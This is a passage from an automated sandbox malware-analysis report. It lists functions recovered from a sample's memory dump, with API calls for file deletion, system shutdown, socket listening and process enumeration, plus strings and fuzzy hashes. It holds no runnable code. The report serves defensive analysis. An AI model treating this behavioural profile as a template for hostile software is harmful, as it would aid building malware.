                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00D3F440
                                                            • Sleep.KERNEL32(0000000A), ref: 00D3F470
                                                            • _wcscmp.LIBCMT ref: 00D3F484
                                                            • _wcscmp.LIBCMT ref: 00D3F49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 00D3F53D
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: 56e9f5db6f0bd72448bbf6bb231db94473d629be3ddaecbc6c64fdc8ed61169c
                                                            • Instruction ID: 3bbffc366c512dfb60962814af554697c1c0892a88eff8cfb555c40529982262
                                                            • Opcode Fuzzy Hash: 56e9f5db6f0bd72448bbf6bb231db94473d629be3ddaecbc6c64fdc8ed61169c
                                                            • Instruction Fuzzy Hash: E9416B71D0021EAFCF10EF64CC45AEEBBB4FF14310F184566E815A7291EB309A48DB60
                                                            Function 00CE5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: cd71265b9a3ddf4052f51ac34988b02becf6d56a510bdf514ee2d947e24b45b0
                                                            • Instruction ID: 6e4e3ed810a27aa8d5e928f61b2f80a8c35c4c685a7082d807959bafabd905a5
                                                            • Opcode Fuzzy Hash: cd71265b9a3ddf4052f51ac34988b02becf6d56a510bdf514ee2d947e24b45b0
                                                            • Instruction Fuzzy Hash: 9312AB70A00619DFCF04DFA6D981AEEB7F5FF48304F20452AE446E7252EB35A915DB60
                                                            Function 00D33B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                              • Part of subcall function 00D34A31: GetFileAttributesW.KERNEL32(?,00D3370B), ref: 00D34A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D33B89
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D33BD9
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D33BEA
                                                            • FindClose.KERNEL32(00000000), ref: 00D33C01
                                                            • FindClose.KERNEL32(00000000), ref: 00D33C0A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 2649000838-1173974218
                                                            • Opcode ID: 4a5ba85a29e918ea3c0944f4721a8dde9491805cf63a96a8ff88c64a73b11553
                                                            • Instruction ID: 9ebd5695b7fb0cde032da1ce3e3d8d68d7d9231e61150a0cc1aeb68403965055
                                                            • Opcode Fuzzy Hash: 4a5ba85a29e918ea3c0944f4721a8dde9491805cf63a96a8ff88c64a73b11553
                                                            • Instruction Fuzzy Hash: 28318E310083859FC301EF24D9918AFB7A8BE91304F444E2EF9D5962A1EB31DA09D767
                                                            Function 00D351BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D2882B
                                                              • Part of subcall function 00D287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D28858
                                                              • Part of subcall function 00D287E1: GetLastError.KERNEL32 ref: 00D28865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00D351F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: ab8d50f99f6ac269fd9adc2670a07e5169086076784b41f85b1913237c32eb0a
                                                            • Instruction ID: f02c163141b18a126eff6486d461861731d573bff43eff41858d081640a92d4e
                                                            • Opcode Fuzzy Hash: ab8d50f99f6ac269fd9adc2670a07e5169086076784b41f85b1913237c32eb0a
                                                            • Instruction Fuzzy Hash: 0F0126397917116BF7286368BC8AFBB7268EB04381F680520FD53EB1D6DA519C0086B8
                                                            Function 00D46283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 00D462DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D462EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00D46307
                                                            • listen.WSOCK32(00000000,00000005), ref: 00D46316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D46330
                                                            • closesocket.WSOCK32(00000000), ref: 00D46344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 81d98cb5c4d5a48df33cd4cbf44d43a2f1c3926d71532d07a46cc9997396eb77
                                                            • Instruction ID: 030a1be46d7cf7af5677ccc7ed9cb66a9017bc5038593e2974560c991e800dda
                                                            • Opcode Fuzzy Hash: 81d98cb5c4d5a48df33cd4cbf44d43a2f1c3926d71532d07a46cc9997396eb77
                                                            • Instruction Fuzzy Hash: FC219E75600304AFCB10EF64CC49A6EB7A9EF49721F18415AE956EB3D1C770ED01DB61
                                                            Function 00CE5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CF0DB6: std::exception::exception.LIBCMT ref: 00CF0DEC
                                                              • Part of subcall function 00CF0DB6: __CxxThrowException@8.LIBCMT ref: 00CF0E01
                                                            • _memmove.LIBCMT ref: 00D20258
                                                            • _memmove.LIBCMT ref: 00D2036D
                                                            • _memmove.LIBCMT ref: 00D20414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: 4510a50d8df04abc4bd1b18b6c1c0db4a0eb28a322b58b300c6fe87bf0fea0d3
                                                            • Instruction ID: 7d6630849ddd08048b2bf652dda1eadec4afe1f5d3f90a312aaa7a075206f5d0
                                                            • Opcode Fuzzy Hash: 4510a50d8df04abc4bd1b18b6c1c0db4a0eb28a322b58b300c6fe87bf0fea0d3
                                                            • Instruction Fuzzy Hash: B702C2B0A00219DBCF04DF65D981ABEBBB5FF44304F24806AE906DB356EB31D954DBA1
                                                            Function 00CD1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00CD19FA
                                                            • GetSysColor.USER32(0000000F), ref: 00CD1A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00CD1A61
                                                              • Part of subcall function 00CD1290: DefDlgProcW.USER32(?,00000020,?), ref: 00CD12D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 0e4032bc0217a7e039c3acd2fc3824e00d3ce2bccedce5b8d50f3ef3477c81a7
                                                            • Instruction ID: bea5ac4f6b2aab89df1d6abe2b79aa977324d66e58a38a979d278c5ab73b4f2f
                                                            • Opcode Fuzzy Hash: 0e4032bc0217a7e039c3acd2fc3824e00d3ce2bccedce5b8d50f3ef3477c81a7
                                                            • Instruction Fuzzy Hash: E1A159B011A654BEEA28AB2A9C54E7F359CDB41352B1C011BFF16D63D6CB20DE01A7B1
                                                            Function 00D46747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D47D8B: inet_addr.WSOCK32(00000000), ref: 00D47DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00D4679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D467C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00D46800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D4680D
                                                            • closesocket.WSOCK32(00000000), ref: 00D46821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 105463ef0b59931b51257b8e7c600b113b3a553adbd7ade234732ad828741442
                                                            • Instruction ID: 2a1256f916fca67f4cf13f86f7a419cdfc30079584e2188164b45147b949ec0b
                                                            • Opcode Fuzzy Hash: 105463ef0b59931b51257b8e7c600b113b3a553adbd7ade234732ad828741442
                                                            • Instruction Fuzzy Hash: 2841B475A00310AFDB10BF64CC86F6E77A9DF49B14F04845DFA56AB3D2CA709D00A7A1
                                                            Function 00D55376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 5c79afdbf3114798db84bdd4c8b7f5a2175e8db9a66b7c16747dc893ad031e3b
                                                            • Instruction ID: 9dbfd1840c1afbd3a3611a3492e94592008253ca9f4d55cce78222ecdfa9b8c6
                                                            • Opcode Fuzzy Hash: 5c79afdbf3114798db84bdd4c8b7f5a2175e8db9a66b7c16747dc893ad031e3b
                                                            • Instruction Fuzzy Hash: 0711B231300B11ABEF226F26EC54A6EBB99EF447A2B454029FC49D7391DB70DD0186B0
                                                            Function 00D280A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D280C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D280CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D280D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D280E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D280F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 482c71cd4d12ac170bd5d529ae993b8e65e5d63d8678a57bf7b109a561044575
                                                            • Instruction ID: d263c2c82c5ce8763e12bf045f4dae9f2beed230b458e93859c29c860e79b2c8
                                                            • Opcode Fuzzy Hash: 482c71cd4d12ac170bd5d529ae993b8e65e5d63d8678a57bf7b109a561044575
                                                            • Instruction Fuzzy Hash: C4F06231246314AFEB110FA5EC8DE6B3BACEF5975AB080025FD45CB290CF619C51EA70
                                                            Function 00D3C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00D3C432
                                                            • CoCreateInstance.OLE32(00D62D6C,00000000,00000001,00D62BDC,?), ref: 00D3C44A
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • CoUninitialize.OLE32 ref: 00D3C6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 97ed53e57c60138ff68379453047b13711e6b42ef0c4b337972b64f41fb921bc
                                                            • Instruction ID: 0fcc939e804bfe238542746c45768536b07d267a7a2fd5657064604beed1b493
                                                            • Opcode Fuzzy Hash: 97ed53e57c60138ff68379453047b13711e6b42ef0c4b337972b64f41fb921bc
                                                            • Instruction Fuzzy Hash: 0BA13B71104205AFD700EF54C891EAFB7E8FF99354F00491DF6959B2A2EB71EA09CB62
                                                            Function 00CD4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CD4AD0), ref: 00CD4B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CD4B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: ee6368a80075a886a7bf78f54d0a9552cc095a2fe68289d9908a1564b44d5de1
                                                            • Instruction ID: 79791f4b67e5ae848a4cf648255879e81c756f00cbd76051654b0db15f2808d3
                                                            • Opcode Fuzzy Hash: ee6368a80075a886a7bf78f54d0a9552cc095a2fe68289d9908a1564b44d5de1
                                                            • Instruction Fuzzy Hash: 30D01235A10B13DFDB209F31D818F0676D4AF15352B11883B9DD5DE250E670D484C664
                                                            Function 00CE3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: 0b5ad6921c144053b650332fcc1eb1d795219a191aa9108df12c5c195c26cbc8
                                                            • Instruction ID: 45fd67d32297b126a42309144ce0d743108d74061c10204032fd42462c3825ae
                                                            • Opcode Fuzzy Hash: 0b5ad6921c144053b650332fcc1eb1d795219a191aa9108df12c5c195c26cbc8
                                                            • Instruction Fuzzy Hash: F222BB716083809FC724DF25D881BAEB7E4EF84714F14492DF99A97391DB30EA45CBA2
                                                            Function 00D4EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00D4EE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00D4EE4B
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00D4EF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00D4EF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 51e71e4f8001f84f4b7323ea2aad348b844837697559e357ec2ff701a93c0e1c
                                                            • Instruction ID: c191d7a5d5f7ad79d29171de11583dfa67dcb789183ec54fd82653018364cf19
                                                            • Opcode Fuzzy Hash: 51e71e4f8001f84f4b7323ea2aad348b844837697559e357ec2ff701a93c0e1c
                                                            • Instruction Fuzzy Hash: 9C517B71504711ABD310EF24DC81E6BB7E8EF94710F00492EFA95962A1EB70A909DBA2
                                                            Function 00CDFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID:
                                                            • API String ID: 3964851224-0
                                                            • Opcode ID: 8a4968a66833f04b29bd30b97cf6d3d2f4219e693a563458e35fa5cd22458e84
                                                            • Instruction ID: b7b13f5918c09c6ae57e40d865f7a49b552b2a8faaadd2a5c01a38f907fe3843
                                                            • Opcode Fuzzy Hash: 8a4968a66833f04b29bd30b97cf6d3d2f4219e693a563458e35fa5cd22458e84
                                                            • Instruction Fuzzy Hash: 03927C746083819FD720DF15C480B6AB7E5BF85304F24892DF99A8B352DBB1ED85CB92
                                                            Function 00D2E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D2E628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: ea29e2162d1ec0ed9bc009ba6c528713817c2659b9b8edd35f1a1cb406f30b38
